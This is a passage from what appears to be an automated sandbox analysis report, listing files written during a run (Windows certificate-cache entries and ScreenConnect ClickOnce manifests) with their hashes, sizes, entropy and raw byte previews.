                                                                                                                                                                                                                                                                        SHA-512:07BD87D43B97F8B7FF22DF21229EDB1D7BD9A601016DE5D919CC38C0B0646278764A4C551F8EB7B21C1063A280AAB8780275DDED733BB95D57033264F786A7E1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                                                        Entropy (8bit):7.552295515462603
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
                                                                                                                                                                                                                                                                        MD5:D3E1E6C22706565D07C5B9CF083E39F6
                                                                                                                                                                                                                                                                        SHA1:12D3BC9406E47A98818A8E21DEEED08DAF79B029
                                                                                                                                                                                                                                                                        SHA-256:AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
                                                                                                                                                                                                                                                                        SHA-512:BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0...*.H.............X.Z..hT.F...^.g..n......W.%T.;~.|LU.......aCW...[....-.k.*F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..*1.4.....U.x}n..F....g..|.......P.|...G......:.F.w,....mj.kj>..2=9.*.Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p|5.6....KN..p.6y..\K........:.T.......q.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                                                        Entropy (8bit):3.457276079732274
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKmr8SsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:2pHkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                        MD5:0D7A7CF198513A32883B594E89C5ECA3
                                                                                                                                                                                                                                                                        SHA1:F20B1770A1EEE98FA842F5B446EC872AC5751B7C
                                                                                                                                                                                                                                                                        SHA-256:9253683F1C5A2EC4AF8DCC64280121F6FA9FE22719051AE6047201AA5BD60C7C
                                                                                                                                                                                                                                                                        SHA-512:EA446E67DF472CBFE94629D6AE828AFA3EC945CE7965205E0747745337EC078E8F1A72DD2B7A24C9A16396B36839CE0348E134EDB0B151F9E25F4AFA0E0CC82D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ...............(...............................................=.w..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKPb99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HbkDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                                        MD5:E400C1311766AA8AF0BC6968C3C56F50
                                                                                                                                                                                                                                                                        SHA1:D5EBC7B3855FAF6404567DC061C8FC158515259E
                                                                                                                                                                                                                                                                        SHA-256:B722903BFE906EBBE7DCFC680B356C95C95020BFDCD6AA7AAB7649512E9F5449
                                                                                                                                                                                                                                                                        SHA-512:ABE37139915D1C09D7C25947D370816DB18B14AA8674D264F65569933E14C422B911FD47ECAB4BC4F9D86BA048E73F22477560221931BF426BE09E1C017DAF07
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... .........%.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                                        Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKU/FzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:jtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                        MD5:C6C9F5EFD7B40517B37DC3ED7D40F971
                                                                                                                                                                                                                                                                        SHA1:A1BBF858F0217353542419C1637E35ED64D91A7C
                                                                                                                                                                                                                                                                        SHA-256:3AF4E69BA166D44E61BE23C5C377759C83133333F7614F3A68E0930EBF483943
                                                                                                                                                                                                                                                                        SHA-512:84FF99485BF32CE36E8EC14806C601506A7D59C6645037CC3BE099F379DCDB1FC129CBC7E5A91F17AD981ADF58B73701D0C0D17FD2048717A6F7C3FD57EE1757
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ..........^.....(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                                        Entropy (8bit):4.001068160367756
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kKYRCZk5RvN9zEZ5KfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlA4:lZiXuUmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                        MD5:290C4414BE0B3F18C3826684047BCA46
                                                                                                                                                                                                                                                                        SHA1:0416B7DCE3EA2ACDAD4AD1B030E9D5137E105886
                                                                                                                                                                                                                                                                        SHA-256:62EE361A1FE274B94648348C8555C505CB010FAA9C5458F23D82DA6817B94D5B
                                                                                                                                                                                                                                                                        SHA-512:C11415C50436313ABF8ED2F822AF63E5C10CD8A660C8CEE14A41A9E950B7E4FD64605C78023239FD91E3C949A12853C4A392D1A6446A7B7704B78C7A8FB095A6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ....(......)....(..................xh....].......................]...... ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                                                        Entropy (8bit):3.0607728827192604
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:kK9tLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:rLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                        MD5:6A1A6399BBDC0743728D8CBF8423BED0
                                                                                                                                                                                                                                                                        SHA1:131560F11F835644085BDCE6038C231C97D586B5
                                                                                                                                                                                                                                                                        SHA-256:4C62B06F3F6C6E62E525D1C16A91CF4E5E87809E6E95658BE3B63E2AB8162673
                                                                                                                                                                                                                                                                        SHA-512:B1538769A8676AA9EFBC606B293D59FDF32DB2672E028685E5012F42600B4EC5429D7C3C3AFCAB1D2B5D5695120739E356E47637BDEEEB9C92F9F49D991DBF23
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:p...... ....l....&N....(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                                                        Entropy (8bit):5.063405177250811
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ilqCCfGo26tX9DkX9R/QPIBM7YV+++amtK/:is5J26tX9DkX9R/QPI+0V+++amtg
                                                                                                                                                                                                                                                                        MD5:15B1110937FDB25DAB468D9E01169767
                                                                                                                                                                                                                                                                        SHA1:1A9BBB23FA152AA96481597390C690B7798E6156
                                                                                                                                                                                                                                                                        SHA-256:05F1D4BDFF9B5ABEB27D87B6CFB23D9CA2BF80D0C57414B197EBED7F9EA62834
                                                                                                                                                                                                                                                                        SHA-512:3A929CA5BD46CAFD4B6997028F5F4361AFF3FE535BE293E40E3A11EBF6104CD60B1B729E5C54E060930213EA83C5B4D702CD844AC549CC2C24391229CB748CF7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:PcmH.........3..pta.f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17866
                                                                                                                                                                                                                                                                        Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                        MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                        SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                        SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                        SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                                                        Entropy (8bit):4.3298089371368835
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:nfJ3uWWmeV+WwQXlmL4MckVM8Aw+QhIYX:nR3CJUUMckmb9Yf
                                                                                                                                                                                                                                                                        MD5:BDCFD58909C6571884D81E95F537EBDB
                                                                                                                                                                                                                                                                        SHA1:A6ED0579A59AD5F57EFE8EA04CBB9019E5393694
                                                                                                                                                                                                                                                                        SHA-256:1B46B9AF10BDA9070C5D54C338F95D8758EDBA59DA88E1987B18EA33978EC857
